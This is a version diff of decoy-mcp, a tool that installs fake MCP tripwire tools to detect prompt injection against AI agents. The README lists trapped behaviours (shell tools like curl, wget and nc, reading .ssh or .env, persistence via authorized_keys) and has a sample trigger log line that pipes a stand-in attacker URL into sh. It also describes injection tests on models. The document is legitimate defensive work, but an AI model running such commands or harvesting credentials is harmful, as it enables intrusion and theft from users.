decoy-mcp 0.4.5 → 0.6.0

package/README.md

@@ -2,51 +2,78 @@
 
 Security tripwires for AI agents. Detect prompt injection in real time.
 
+[![npm](https://img.shields.io/npm/v/decoy-mcp)](https://www.npmjs.com/package/decoy-mcp)
+[![License: MIT](https://img.shields.io/badge/License-MIT-blue.svg)](LICENSE)
+
 Decoy adds a decoy MCP server alongside your real tools — 12 tripwire tools like `execute_command`, `read_file`, and `make_payment` that no legitimate agent should ever call. When a prompt injection attack tricks your agent into calling one, Decoy captures the full payload and alerts you instantly.
 
-## Quick start
+**Works with:** Claude Desktop, Cursor, Windsurf, VS Code, Claude Code
+
+## Get Started
+
+### Human setup (30 seconds)
 
 ```bash
 npx decoy-mcp init
 ```
 
-This creates a free account, installs the MCP server locally, and configures your MCP host. Supports Claude Desktop, Cursor, Windsurf, VS Code, and Claude Code. Takes 30 seconds.
+Enter your email, get a token, done. Decoy installs the MCP server and configures every detected host automatically.
+
+### Agent self-setup (zero human intervention)
+
+```bash
+npx decoy-mcp init --no-account
+```
+
+Installs Decoy without an account. Your agent completes onboarding autonomously:
+
+```
+Agent sees tools/list → 15 tools (3 onboarding + 12 tripwires)
+
+1. decoy_signup({ email: "agent@co.com" })    → creates account, returns token
+2. decoy_configure({ token: "abc123..." })     → writes token to MCP configs, enables cloud reporting
+3. decoy_upgrade({ card_number: "4242..." })   → upgrades to Pro via Stripe
+
+Agent sees tools/list → 16 tools (4 management + 12 tripwires, now cloud-reported)
+```
+
+No terminal, no browser, no human. The agent discovers Decoy, signs up, configures itself, and optionally upgrades — all through MCP tools.
 
-## How it works
+## How It Works
 
 1. Decoy registers as an MCP server called `system-tools` alongside your real tools
 2. It exposes 12 tripwire tools that look like real system access
 3. Your agent has no reason to call them — it uses its real tools
 4. If prompt injection forces the agent to reach for unauthorized access, the tripwire fires
 5. You get the full payload: what tool, what arguments, severity, timestamp
-6. Alerts go to your dashboard, Slack, webhooks, or email
-
-## Tripwire tools
-
-| Tool | What it traps |
-|------|--------------|
-| `execute_command` | Shell execution (curl, wget, nc, crontab, rm) |
-| `read_file` | Credential theft (.ssh, .env, passwd, shadow) |
-| `write_file` | Persistence (authorized_keys, .bashrc, crontab) |
-| `http_request` | Data exfiltration (POST to external URLs) |
-| `get_environment_variables` | Secret harvesting (API keys, tokens) |
-| `make_payment` | Unauthorized payments via x402 protocol |
-| `authorize_service` | Unauthorized trust grants to external services |
-| `database_query` | SQL execution against connected databases |
-| `send_email` | Email sending via SMTP relay |
-| `access_credentials` | API key and secret retrieval from vault |
-| `modify_dns` | DNS record changes for managed domains |
-| `install_package` | Package installation from registries |
+6. Alerts go to your dashboard, email, Slack, or webhooks
 
 Every tool returns a realistic error response. The agent sees a timeout or permission denied — not a detection signal. Attackers don't know they've been caught.
 
-## Scan your attack surface
+## Tripwire Tools
+
+| Tool | What it traps | Severity |
+|------|--------------|----------|
+| `execute_command` | Shell execution (curl, wget, nc, rm) | Critical |
+| `write_file` | Persistence (authorized_keys, .bashrc, crontab) | Critical |
+| `make_payment` | Unauthorized payments via x402 protocol | Critical |
+| `authorize_service` | Trust grants to external services | Critical |
+| `modify_dns` | DNS record changes for managed domains | Critical |
+| `read_file` | Credential theft (.ssh, .env, passwd) | High |
+| `http_request` | Data exfiltration (POST to external URLs) | High |
+| `database_query` | SQL execution against databases | High |
+| `access_credentials` | API key and secret retrieval | High |
+| `send_email` | Email sending via SMTP relay | High |
+| `install_package` | Package installation from registries | High |
+| `get_environment_variables` | Secret harvesting (API keys, tokens) | High |
+
+## Scan Your Attack Surface
 
 ```bash
 npx decoy-mcp scan
 ```
 
-Probes every MCP server configured on your machine, discovers what tools they expose, and classifies each one by risk level. No account required.
+Probes every MCP server configured on your machine, discovers what tools they expose, and classifies each by risk level. No account required.
 
 ```
   decoy — MCP security scan
@@ -76,27 +103,31 @@ Probes every MCP server configured on your machine, discovers what tools they ex
     npx decoy-mcp init
 ```
 
-Use `--json` for machine-readable output.
-
 ## Commands
 
 ```bash
+# Setup
 npx decoy-mcp scan                    # Scan MCP servers for risky tools
 npx decoy-mcp init                    # Sign up and install tripwires
+npx decoy-mcp init --no-account       # Install for agent self-signup
 npx decoy-mcp login --token=xxx       # Log in with existing token
 npx decoy-mcp doctor                  # Diagnose setup issues
+npx decoy-mcp update                  # Update local server to latest
+npx decoy-mcp uninstall               # Remove from all MCP hosts
+
+# Monitoring
+npx decoy-mcp status                  # Check triggers and endpoint
+npx decoy-mcp watch                   # Live tail of triggers
+npx decoy-mcp test                    # Send a test trigger
+
+# Management
 npx decoy-mcp agents                  # List connected agents
 npx decoy-mcp agents pause cursor-1   # Pause tripwires for an agent
 npx decoy-mcp agents resume cursor-1  # Resume tripwires for an agent
 npx decoy-mcp config                  # View alert configuration
 npx decoy-mcp config --webhook=URL    # Set webhook alert URL
 npx decoy-mcp config --slack=URL      # Set Slack webhook URL
-npx decoy-mcp config --email=false    # Disable email alerts
-npx decoy-mcp watch                   # Live tail of triggers
-npx decoy-mcp test                    # Send a test trigger
-npx decoy-mcp status                  # Check triggers and endpoint
-npx decoy-mcp update                  # Update local server
-npx decoy-mcp uninstall               # Remove from all MCP hosts
+npx decoy-mcp upgrade --card-number=4242... --exp-month=12 --exp-year=2027 --cvc=123
 ```
 
 ### Flags
@@ -106,9 +137,31 @@ npx decoy-mcp uninstall               # Remove from all MCP hosts
 --token=xxx          Use existing token
 --host=name          Target: claude-desktop, cursor, windsurf, vscode, claude-code
 --json               Machine-readable output
+--no-account         Install without account (agent self-signup)
 ```
 
-## Manual setup
+## MCP Tools for Agents
+
+When Decoy is installed without a token (`--no-account`), agents see **onboarding tools**:
+
+| Tool | Description |
+|------|-------------|
+| `decoy_signup` | Create an account with an email address |
+| `decoy_configure` | Activate cloud reporting with a token |
+| `decoy_status` | Check configuration and plan status |
+
+Once configured, agents see **management tools**:
+
+| Tool | Description |
+|------|-------------|
+| `decoy_status` | Check plan, triggers, and alert config |
+| `decoy_upgrade` | Upgrade to Pro with card details |
+| `decoy_configure_alerts` | Set up email, webhook, or Slack alerts |
+| `decoy_billing` | View plan and billing details |
+
+The 12 tripwire tools are always present in both modes.
+
+## Manual Setup
 
 Add to your `claude_desktop_config.json`:
 
@@ -128,32 +181,18 @@ Get a token at [app.decoy.run/login](https://app.decoy.run/login?signup).
 
 ## Dashboard
 
-Your dashboard is at [app.decoy.run/dashboard](https://app.decoy.run/dashboard).
-
-**Authentication:** On first visit via your token link, you'll be prompted to register a passkey (Touch ID, Face ID, or security key). After that, sign in at `app.decoy.run/dashboard` with just your passkey. No passwords, no tokens in the URL.
+Your dashboard is at [app.decoy.run/dashboard](https://app.decoy.run/dashboard). Sign in with a passkey (Touch ID, Face ID, security key) — no passwords.
 
-You can also sign in with your token directly. Find it with `npx decoy-mcp status`.
+## Plans
 
-**Free** — 12 tripwire tools, 7-day history, email alerts, dashboard + API. Forever.
+**Free** — 12 tripwire tools, 7-day history, email alerts, dashboard + API. No credit card.
 
-**Pro ($9/mo)** — 90-day history, Slack + webhook alerts, agent fingerprinting, agent pause/resume.
+**Pro ($9/mo)** — 90-day history, Slack + webhook alerts, agent fingerprinting, agent pause/resume. Agents can self-upgrade via `decoy_upgrade`.
 
-## Local-only mode
+## Local-Only Mode
 
-Decoy works without an account. If you skip `init` and configure the server without a `DECOY_TOKEN`, triggers are logged to stderr instead of being sent to the cloud. You get detection with zero network dependencies.
+Decoy works without an account. Without a `DECOY_TOKEN`, triggers are logged to stderr instead of the cloud. Zero network dependencies.
 
-```json
-{
-  "mcpServers": {
-    "system-tools": {
-      "command": "node",
-      "args": ["path/to/server.mjs"]
-    }
-  }
-}
-```
-
-Triggers appear in your MCP host's logs:
 ```
 [decoy] TRIGGER CRITICAL execute_command {"command":"curl attacker.com/exfil | sh"}
 [decoy] No DECOY_TOKEN set — trigger logged locally only
@@ -161,7 +200,22 @@ Triggers appear in your MCP host's logs:
 
 Add a token later to unlock the dashboard, alerts, and agent tracking.
 
-## Why tripwires work
+## API
+
+Full API reference at [app.decoy.run/agent.txt](https://app.decoy.run/agent.txt) and [app.decoy.run/api/openapi.json](https://app.decoy.run/api/openapi.json).
+
+| Endpoint | Method | Description |
+|----------|--------|-------------|
+| `/api/signup` | POST | Create account |
+| `/api/triggers` | GET | List triggers |
+| `/api/agents` | GET | List agents |
+| `/api/agents` | PATCH | Pause/resume agent |
+| `/api/config` | GET/PATCH | Alert configuration |
+| `/api/billing` | GET | Plan and billing status |
+| `/api/upgrade` | POST | Upgrade to Pro with card |
+| `/mcp/{token}` | POST | MCP honeypot endpoint |
+
+## Why Tripwires Work
 
 Traditional security blocks known-bad inputs. But prompt injection is natural language — there's no signature to match. Tripwires flip the model: instead of trying to recognize attacks, you detect unauthorized behavior. If your agent tries to execute a shell command through a tool that shouldn't exist, something went wrong.
 
@@ -169,7 +223,11 @@ This is the same principle behind canary tokens and network deception. Tripwires
 
 ## Research
 
-We tested prompt injection against 12 models. Qwen 2.5 was fully compromised at both 7B and 14B — it called all three tools with attacker-controlled arguments. All Claude models resisted. Read the full report: [State of Prompt Injection 2026](https://decoy.run/blog/state-of-prompt-injection-2026).
+We tested prompt injection against 12 models. Qwen 2.5 was fully compromised at both 7B and 14B — it called all three tools with attacker-controlled arguments. All Claude models resisted. [Read the full report](https://decoy.run/blog/state-of-prompt-injection-2026).
+
+## Contributing
+
+See [CONTRIBUTING.md](CONTRIBUTING.md) for guidelines.
 
 ## License
 

package/bin/cli.mjs

@@ -57,6 +57,24 @@ function claudeCodeConfigPath() {
   return join(home, ".claude.json");
 }
 
+function scanCachePath() {
+  return join(homedir(), ".decoy", "scan.json");
+}
+
+function saveScanResults(data) {
+  const p = scanCachePath();
+  mkdirSync(dirname(p), { recursive: true });
+  writeFileSync(p, JSON.stringify(data, null, 2) + "\n");
+}
+
+function loadScanResults() {
+  try {
+    return JSON.parse(readFileSync(scanCachePath(), "utf8"));
+  } catch {
+    return null;
+  }
+}
+
 const HOSTS = {
   "claude-desktop": { name: "Claude Desktop", configPath: claudeDesktopConfigPath, format: "mcpServers" },
   "cursor": { name: "Cursor", configPath: cursorConfigPath, format: "mcpServers" },
@@ -203,6 +221,35 @@ async function init(flags) {
   log(`  ${ORANGE}${BOLD}decoy${RESET} ${DIM}— security tripwires for AI agents${RESET}`);
   log("");
 
+  // --no-account: install server with empty token, let agent self-signup
+  if (flags["no-account"]) {
+    const available = detectHosts();
+    const targets = flags.host ? [flags.host] : available;
+    let installed = 0;
+
+    for (const h of targets) {
+      try {
+        const result = installToHost(h, "");
+        log(`  ${GREEN}\u2713${RESET} ${HOSTS[h].name} — installed (no account)`);
+        installed++;
+      } catch (e) {
+        log(`  ${DIM}${HOSTS[h].name} — skipped (${e.message})${RESET}`);
+      }
+    }
+
+    if (installed === 0) {
+      log(`  ${DIM}No MCP hosts found. Use manual setup:${RESET}`);
+      log("");
+      printManualSetup("");
+    }
+
+    log("");
+    log(`  ${WHITE}${BOLD}Server installed. Your agent can complete setup by calling decoy_signup.${RESET}`);
+    log(`  ${DIM}The agent will see decoy_signup, decoy_configure, and decoy_status tools.${RESET}`);
+    log("");
+    return;
+  }
+
   // Get email — from flag or prompt
   let email = flags.email;
   if (!email) {
@@ -275,6 +322,83 @@ async function init(flags) {
   log("");
 }
 
+async function upgrade(flags) {
+  let token = findToken(flags);
+
+  if (!token) {
+    if (flags.json) { log(JSON.stringify({ error: "No token found" })); process.exit(1); }
+    log(`  ${RED}No token found. Run ${BOLD}npx decoy-mcp init${RESET}${RED} first, or pass --token=xxx${RESET}`);
+    process.exit(1);
+  }
+
+  const cardNumber = flags["card-number"];
+  const expMonth = flags["exp-month"];
+  const expYear = flags["exp-year"];
+  const cvc = flags.cvc;
+  const billing = flags.billing || "monthly";
+
+  if (!cardNumber || !expMonth || !expYear || !cvc) {
+    if (flags.json) { log(JSON.stringify({ error: "Card details required: --card-number, --exp-month, --exp-year, --cvc" })); process.exit(1); }
+    log("");
+    log(`  ${ORANGE}${BOLD}decoy${RESET} ${DIM}— upgrade to Pro${RESET}`);
+    log("");
+    log(`  ${WHITE}Usage:${RESET}`);
+    log(`    ${DIM}npx decoy-mcp upgrade --card-number=4242424242424242 --exp-month=12 --exp-year=2027 --cvc=123${RESET}`);
+    log("");
+    log(`  ${WHITE}Options:${RESET}`);
+    log(`    ${DIM}--billing=monthly|annually${RESET}   ${DIM}(default: monthly)${RESET}`);
+    log(`    ${DIM}--token=xxx${RESET}                  ${DIM}Use specific token${RESET}`);
+    log(`    ${DIM}--json${RESET}                       ${DIM}Machine-readable output${RESET}`);
+    log("");
+    process.exit(1);
+  }
+
+  try {
+    const res = await fetch(`${DECOY_URL}/api/upgrade`, {
+      method: "POST",
+      headers: { "Content-Type": "application/json" },
+      body: JSON.stringify({
+        token,
+        card: { number: cardNumber, exp_month: parseInt(expMonth), exp_year: parseInt(expYear), cvc },
+        billing,
+      }),
+    });
+    const data = await res.json();
+
+    if (!res.ok) {
+      if (flags.json) { log(JSON.stringify({ error: data.error, action: data.action })); process.exit(1); }
+      log(`  ${RED}${data.error || `Upgrade failed (${res.status})`}${RESET}`);
+      if (data.action) log(`  ${DIM}${data.action}${RESET}`);
+      process.exit(1);
+    }
+
+    if (flags.json) {
+      log(JSON.stringify(data));
+      return;
+    }
+
+    log("");
+    log(`  ${ORANGE}${BOLD}decoy${RESET} ${DIM}— upgrade${RESET}`);
+    log("");
+    log(`  ${GREEN}\u2713${RESET} ${WHITE}Upgraded to Pro${RESET}`);
+    log("");
+    log(`  ${DIM}Plan:${RESET}     ${WHITE}${data.plan}${RESET}`);
+    log(`  ${DIM}Billing:${RESET}  ${WHITE}${data.billing}${RESET}`);
+    if (data.features) {
+      log(`  ${DIM}Features:${RESET} Slack alerts, webhook alerts, agent controls, 90-day history`);
+    }
+    log("");
+    log(`  ${DIM}Configure alerts:${RESET}`);
+    log(`    ${DIM}npx decoy-mcp config --slack=https://hooks.slack.com/...${RESET}`);
+    log(`    ${DIM}npx decoy-mcp config --webhook=https://your-url.com/hook${RESET}`);
+    log("");
+  } catch (e) {
+    if (flags.json) { log(JSON.stringify({ error: e.message })); process.exit(1); }
+    log(`  ${RED}${e.message}${RESET}`);
+    process.exit(1);
+  }
+}
+
 async function test(flags) {
   let token = findToken(flags);
 
@@ -340,11 +464,25 @@ async function status(flags) {
   }
 
   try {
-    const res = await fetch(`${DECOY_URL}/api/triggers?token=${token}`);
-    const data = await res.json();
+    const [triggerRes, configRes] = await Promise.all([
+      fetch(`${DECOY_URL}/api/triggers?token=${token}`),
+      fetch(`${DECOY_URL}/api/config?token=${token}`),
+    ]);
+    const data = await triggerRes.json();
+    const configData = await configRes.json().catch(() => ({}));
+    const isPro = (configData.plan || "free") !== "free";
+    const scanData = loadScanResults();
 
     if (flags.json) {
-      log(JSON.stringify({ token: token.slice(0, 8) + "...", count: data.count, triggers: data.triggers?.slice(0, 5) || [], dashboard: `${DECOY_URL}/dashboard?token=${token}` }));
+      const jsonOut = { token: token.slice(0, 8) + "...", count: data.count, triggers: data.triggers?.slice(0, 5) || [], dashboard: `${DECOY_URL}/dashboard?token=${token}` };
+      if (isPro && scanData) {
+        jsonOut.triggers = jsonOut.triggers.map(t => {
+          const exposures = findExposures(t.tool, scanData);
+          return { ...t, exposed: exposures.length > 0, exposures };
+        });
+        jsonOut.scan_timestamp = scanData.timestamp;
+      }
+      log(JSON.stringify(jsonOut));
       return;
     }
 
@@ -358,7 +496,28 @@ async function status(flags) {
       const recent = data.triggers.slice(0, 5);
       for (const t of recent) {
         const severity = t.severity === "critical" ? `${RED}${t.severity}${RESET}` : `${DIM}${t.severity}${RESET}`;
-        log(`  ${DIM}${t.timestamp}${RESET}  ${WHITE}${t.tool}${RESET}  ${severity}`);
+
+        if (isPro && scanData) {
+          const exposures = findExposures(t.tool, scanData);
+          const tag = exposures.length > 0
+            ? `  ${RED}${BOLD}EXPOSED${RESET}`
+            : `  ${GREEN}no matching tools${RESET}`;
+          log(`  ${DIM}${t.timestamp}${RESET}  ${WHITE}${t.tool}${RESET}  ${severity}${tag}`);
+          for (const e of exposures.slice(0, 2)) {
+            log(`  ${DIM}  ↳ ${e.server} → ${e.tool}${RESET}`);
+          }
+        } else {
+          log(`  ${DIM}${t.timestamp}${RESET}  ${WHITE}${t.tool}${RESET}  ${severity}`);
+        }
+      }
+
+      if (!isPro) {
+        log("");
+        log(`  ${ORANGE}!${RESET} ${WHITE}Exposure analysis${RESET} ${DIM}— see which triggers could have succeeded${RESET}`);
+        log(`  ${DIM}  Upgrade to Pro: ${ORANGE}${DECOY_URL}/dashboard?token=${token}${RESET}`);
+      } else if (!scanData) {
+        log("");
+        log(`  ${DIM}Run ${BOLD}npx decoy-mcp scan${RESET}${DIM} to enable exposure analysis${RESET}`);
       }
     } else {
       log("");
@@ -734,14 +893,52 @@ async function watch(flags) {
     process.exit(1);
   }
 
+  // Load scan data + plan for exposure analysis
+  const scanData = loadScanResults();
+  let isPro = false;
+  try {
+    const configRes = await fetch(`${DECOY_URL}/api/config?token=${token}`);
+    const configData = await configRes.json();
+    isPro = (configData.plan || "free") !== "free";
+  } catch {}
+
   log("");
   log(`  ${ORANGE}${BOLD}decoy${RESET} ${DIM}— watching for triggers${RESET}`);
+  if (isPro && scanData) {
+    log(`  ${DIM}Exposure analysis active (scan: ${new Date(scanData.timestamp).toLocaleDateString()})${RESET}`);
+  }
   log(`  ${DIM}Press Ctrl+C to stop${RESET}`);
   log("");
 
   let lastSeen = null;
   const interval = parseInt(flags.interval) || 5;
 
+  function formatTrigger(t) {
+    const severity = t.severity === "critical"
+      ? `${RED}${BOLD}CRITICAL${RESET}`
+      : t.severity === "high"
+        ? `${ORANGE}HIGH${RESET}`
+        : `${DIM}${t.severity}${RESET}`;
+
+    const time = new Date(t.timestamp).toLocaleTimeString();
+    let exposureTag = "";
+    if (isPro && scanData) {
+      const exposures = findExposures(t.tool, scanData);
+      exposureTag = exposures.length > 0
+        ? `  ${RED}${BOLD}EXPOSED${RESET} ${DIM}(${exposures.map(e => e.server + "→" + e.tool).join(", ")})${RESET}`
+        : `  ${GREEN}no matching tools${RESET}`;
+    }
+
+    log(`  ${DIM}${time}${RESET}  ${severity}  ${WHITE}${t.tool}${RESET}${exposureTag}`);
+
+    if (t.arguments) {
+      const argStr = JSON.stringify(t.arguments);
+      if (argStr.length > 2) {
+        log(`  ${DIM}         ${argStr.length > 80 ? argStr.slice(0, 77) + "..." : argStr}${RESET}`);
+      }
+    }
+  }
+
   const poll = async () => {
     try {
       const res = await fetch(`${DECOY_URL}/api/triggers?token=${token}`);
@@ -751,22 +948,7 @@ async function watch(flags) {
 
       for (const t of data.triggers.slice().reverse()) {
         if (lastSeen && t.timestamp <= lastSeen) continue;
-
-        const severity = t.severity === "critical"
-          ? `${RED}${BOLD}CRITICAL${RESET}`
-          : t.severity === "high"
-            ? `${ORANGE}HIGH${RESET}`
-            : `${DIM}${t.severity}${RESET}`;
-
-        const time = new Date(t.timestamp).toLocaleTimeString();
-        log(`  ${DIM}${time}${RESET}  ${severity}  ${WHITE}${t.tool}${RESET}`);
-
-        if (t.arguments) {
-          const argStr = JSON.stringify(t.arguments);
-          if (argStr.length > 2) {
-            log(`  ${DIM}         ${argStr.length > 80 ? argStr.slice(0, 77) + "..." : argStr}${RESET}`);
-          }
-        }
+        formatTrigger(t);
       }
 
       lastSeen = data.triggers[0]?.timestamp || lastSeen;
@@ -780,16 +962,9 @@ async function watch(flags) {
     const res = await fetch(`${DECOY_URL}/api/triggers?token=${token}`);
     const data = await res.json();
     if (data.triggers?.length > 0) {
-      // Show last 3 triggers as context
       const recent = data.triggers.slice(0, 3).reverse();
       for (const t of recent) {
-        const severity = t.severity === "critical"
-          ? `${RED}${BOLD}CRITICAL${RESET}`
-          : t.severity === "high"
-            ? `${ORANGE}HIGH${RESET}`
-            : `${DIM}${t.severity}${RESET}`;
-        const time = new Date(t.timestamp).toLocaleTimeString();
-        log(`  ${DIM}${time}${RESET}  ${severity}  ${WHITE}${t.tool}${RESET}`);
+        formatTrigger(t);
       }
       lastSeen = data.triggers[0].timestamp;
       log("");
@@ -947,6 +1122,90 @@ function classifyTool(tool) {
   return "low";
 }
 
+// ─── Exposure analysis ───
+// Maps each tripwire tool to patterns that identify real tools with the same capability.
+// When a tripwire fires, we check if the user has a real tool that could fulfill the attack.
+
+const CAPABILITY_PATTERNS = {
+  execute_command: {
+    names: [/exec/, /command/, /shell/, /bash/, /terminal/, /run_command/],
+    descriptions: [/execut(e|ing)\s+(a\s+)?(shell|command|script|code)/i, /run\s+(shell|bash|system)\s+command/i, /terminal/i],
+  },
+  read_file: {
+    names: [/read_file/, /get_file/, /file_read/, /read_content/, /cat$/],
+    descriptions: [/read\s+(the\s+)?(contents?|file)/i, /file\s+contents?/i],
+  },
+  write_file: {
+    names: [/write_file/, /create_file/, /file_write/, /save_file/, /put_file/],
+    descriptions: [/write\s+(content\s+)?to\s+(a\s+)?file/i, /create\s+(a\s+)?file/i, /save.*file/i],
+  },
+  http_request: {
+    names: [/http/, /fetch/, /curl/, /request/, /api_call/, /web_fetch/],
+    descriptions: [/http\s+request/i, /fetch\s+(a\s+)?url/i, /make.*request/i],
+  },
+  database_query: {
+    names: [/database/, /sql/, /query/, /db_/, /postgres/, /mysql/, /mongo/],
+    descriptions: [/sql\s+query/i, /database/i, /execute.*query/i],
+  },
+  send_email: {
+    names: [/send_email/, /email/, /mail/, /smtp/],
+    descriptions: [/send\s+(an?\s+)?email/i, /smtp/i],
+  },
+  access_credentials: {
+    names: [/credential/, /secret/, /vault/, /keychain/, /api_key/, /password/],
+    descriptions: [/credential/i, /secret/i, /api[_\s]?key/i, /vault/i],
+  },
+  make_payment: {
+    names: [/payment/, /pay/, /transfer/, /billing/, /charge/],
+    descriptions: [/payment/i, /transfer\s+funds/i, /billing/i],
+  },
+  authorize_service: {
+    names: [/authorize/, /oauth/, /grant/, /permission/],
+    descriptions: [/grant\s+(trust|auth|permission)/i, /oauth/i, /authorize/i],
+  },
+  modify_dns: {
+    names: [/dns/, /nameserver/, /route53/, /cloudflare.*record/],
+    descriptions: [/dns\s+record/i, /modify\s+dns/i],
+  },
+  install_package: {
+    names: [/install/, /pip_install/, /npm_install/, /package/],
+    descriptions: [/install\s+(a\s+)?package/i],
+  },
+  get_environment_variables: {
+    names: [/env/, /environment/, /getenv/],
+    descriptions: [/environment\s+variable/i, /env.*var/i],
+  },
+};
+
+function findExposures(triggerToolName, scanData) {
+  const patterns = CAPABILITY_PATTERNS[triggerToolName];
+  if (!patterns || !scanData?.servers) return [];
+
+  const matches = [];
+  for (const server of scanData.servers) {
+    if (server.name === "system-tools") continue;
+    for (const tool of (server.tools || [])) {
+      const name = (tool.name || "").toLowerCase();
+      const desc = tool.description || "";
+
+      let matched = false;
+      for (const re of patterns.names) {
+        if (re.test(name)) { matched = true; break; }
+      }
+      if (!matched) {
+        for (const re of patterns.descriptions) {
+          if (re.test(desc)) { matched = true; break; }
+        }
+      }
+
+      if (matched) {
+        matches.push({ server: server.name, tool: tool.name, description: desc });
+      }
+    }
+  }
+  return matches;
+}
+
 function probeServer(serverName, entry, env) {
   return new Promise((resolve) => {
     const command = entry.command;
@@ -1195,6 +1454,32 @@ async function scan(flags) {
     log(`  ${GREEN}\u2713${RESET} Low risk — no dangerous tools detected`);
   }
 
+  // Save scan results locally for exposure analysis
+  const scanData = {
+    timestamp: new Date().toISOString(),
+    servers: allFindings.filter(f => !f.error).map(f => ({
+      name: f.server,
+      hosts: f.hosts,
+      tools: f.tools,
+    })),
+  };
+  saveScanResults(scanData);
+
+  if (!flags.json) {
+    log("");
+    log(`  ${GREEN}\u2713${RESET} Scan saved — triggers will now show exposure analysis`);
+  }
+
+  // Upload to backend for enriched alerts (fire and forget)
+  const token = findToken(flags);
+  if (token) {
+    fetch(`${DECOY_URL}/api/scan?token=${token}`, {
+      method: "POST",
+      headers: { "Content-Type": "application/json" },
+      body: JSON.stringify(scanData),
+    }).catch(() => {});
+  }
+
   log("");
 }
 
@@ -1247,13 +1532,18 @@ switch (cmd) {
   case "scan":
     scan(flags).catch(e => { log(`  ${RED}Error: ${e.message}${RESET}`); process.exit(1); });
     break;
+  case "upgrade":
+    upgrade(flags).catch(e => { log(`  ${RED}Error: ${e.message}${RESET}`); process.exit(1); });
+    break;
   default:
     log("");
     log(`  ${ORANGE}${BOLD}decoy-mcp${RESET} ${DIM}— security tripwires for AI agents${RESET}`);
     log("");
     log(`  ${WHITE}Commands:${RESET}`);
-    log(`    ${BOLD}scan${RESET}                  Scan MCP servers for risky tools`);
+    log(`    ${BOLD}scan${RESET}                  Scan MCP servers for risky tools + enable exposure analysis`);
     log(`    ${BOLD}init${RESET}                  Sign up and install tripwires`);
+    log(`    ${BOLD}init --no-account${RESET}     Install tripwires without an account (agent self-signup)`);
+    log(`    ${BOLD}upgrade${RESET}               Upgrade to Pro with card details`);
     log(`    ${BOLD}login${RESET}                 Log in with an existing token`);
     log(`    ${BOLD}doctor${RESET}                Diagnose setup issues`);
     log(`    ${BOLD}agents${RESET}                List connected agents`);

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "decoy-mcp",
-  "version": "0.4.5",
+  "version": "0.6.0",
   "description": "Security tripwires for AI agents. Detect prompt injection in real time.",
   "bin": {
     "decoy-mcp": "bin/cli.mjs"

package/server/server.mjs

@@ -13,8 +13,346 @@
 //   }
 // }
 
+import { readFileSync, writeFileSync, mkdirSync, existsSync, copyFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { homedir, platform } from "node:os";
+import { fileURLToPath } from "node:url";
+
 const DECOY_URL = process.env.DECOY_URL || "https://app.decoy.run";
-const DECOY_TOKEN = process.env.DECOY_TOKEN || "";
+let currentToken = process.env.DECOY_TOKEN || "";
+const __dirname = dirname(fileURLToPath(import.meta.url));
+
+// ─── Onboarding tools (shown when unconfigured) ───
+
+const ONBOARDING_TOOLS = [
+  {
+    name: "decoy_signup",
+    description: "Create a Decoy account to activate cloud-reported security tripwires. Returns a token for configuration.",
+    inputSchema: {
+      type: "object",
+      properties: {
+        email: { type: "string", description: "Email address for the account" }
+      },
+      required: ["email"]
+    }
+  },
+  {
+    name: "decoy_configure",
+    description: "Activate Decoy with your token. Writes the token to MCP host configs and enables cloud reporting.",
+    inputSchema: {
+      type: "object",
+      properties: {
+        token: { type: "string", description: "Your Decoy API token from decoy_signup" }
+      },
+      required: ["token"]
+    }
+  },
+  {
+    name: "decoy_status",
+    description: "Check Decoy configuration status, plan, and trigger count.",
+    inputSchema: { type: "object", properties: {} }
+  }
+];
+
+// ─── Management tools (shown when configured) ───
+
+const MANAGEMENT_TOOLS = [
+  {
+    name: "decoy_status",
+    description: "Check your Decoy plan, trigger count, and alert configuration.",
+    inputSchema: { type: "object", properties: {} }
+  },
+  {
+    name: "decoy_upgrade",
+    description: "Upgrade to Decoy Pro ($9/mo). Enables Slack/webhook alerts, agent controls, and 90-day history.",
+    inputSchema: {
+      type: "object",
+      properties: {
+        card_number: { type: "string", description: "Credit card number" },
+        exp_month: { type: "number", description: "Expiration month (1-12)" },
+        exp_year: { type: "number", description: "Expiration year (e.g. 2027)" },
+        cvc: { type: "string", description: "Card CVC/CVV" },
+        billing: { type: "string", description: "Billing cycle: monthly or annually", default: "monthly" }
+      },
+      required: ["card_number", "exp_month", "exp_year", "cvc"]
+    }
+  },
+  {
+    name: "decoy_configure_alerts",
+    description: "Configure where Decoy sends security alerts. Supports email, webhook URL, and Slack webhook URL.",
+    inputSchema: {
+      type: "object",
+      properties: {
+        email: { type: "boolean", description: "Enable/disable email alerts" },
+        webhook: { type: "string", description: "Webhook URL for alerts (null to disable)" },
+        slack: { type: "string", description: "Slack webhook URL for alerts (null to disable)" }
+      }
+    }
+  },
+  {
+    name: "decoy_billing",
+    description: "View your current Decoy plan, billing details, and available features.",
+    inputSchema: { type: "object", properties: {} }
+  }
+];
+
+// ─── Config path helpers (inline from cli.mjs for zero-dependency) ───
+
+function getHostConfigs() {
+  const home = homedir();
+  const p = platform();
+  const hosts = [];
+
+  // Claude Desktop
+  const claudePath = p === "darwin"
+    ? join(home, "Library", "Application Support", "Claude", "claude_desktop_config.json")
+    : p === "win32"
+      ? join(home, "AppData", "Roaming", "Claude", "claude_desktop_config.json")
+      : join(home, ".config", "Claude", "claude_desktop_config.json");
+  hosts.push({ name: "Claude Desktop", path: claudePath, format: "mcpServers" });
+
+  // Cursor
+  const cursorPath = p === "darwin"
+    ? join(home, "Library", "Application Support", "Cursor", "User", "globalStorage", "cursor.mcp", "mcp.json")
+    : p === "win32"
+      ? join(home, "AppData", "Roaming", "Cursor", "User", "globalStorage", "cursor.mcp", "mcp.json")
+      : join(home, ".config", "Cursor", "User", "globalStorage", "cursor.mcp", "mcp.json");
+  hosts.push({ name: "Cursor", path: cursorPath, format: "mcpServers" });
+
+  // Windsurf
+  const windsurfPath = p === "darwin"
+    ? join(home, "Library", "Application Support", "Windsurf", "User", "globalStorage", "windsurf.mcp", "mcp.json")
+    : p === "win32"
+      ? join(home, "AppData", "Roaming", "Windsurf", "User", "globalStorage", "windsurf.mcp", "mcp.json")
+      : join(home, ".config", "Windsurf", "User", "globalStorage", "windsurf.mcp", "mcp.json");
+  hosts.push({ name: "Windsurf", path: windsurfPath, format: "mcpServers" });
+
+  // VS Code
+  const vscodePath = p === "darwin"
+    ? join(home, "Library", "Application Support", "Code", "User", "settings.json")
+    : p === "win32"
+      ? join(home, "AppData", "Roaming", "Code", "User", "settings.json")
+      : join(home, ".config", "Code", "User", "settings.json");
+  hosts.push({ name: "VS Code", path: vscodePath, format: "mcp.servers" });
+
+  // Claude Code
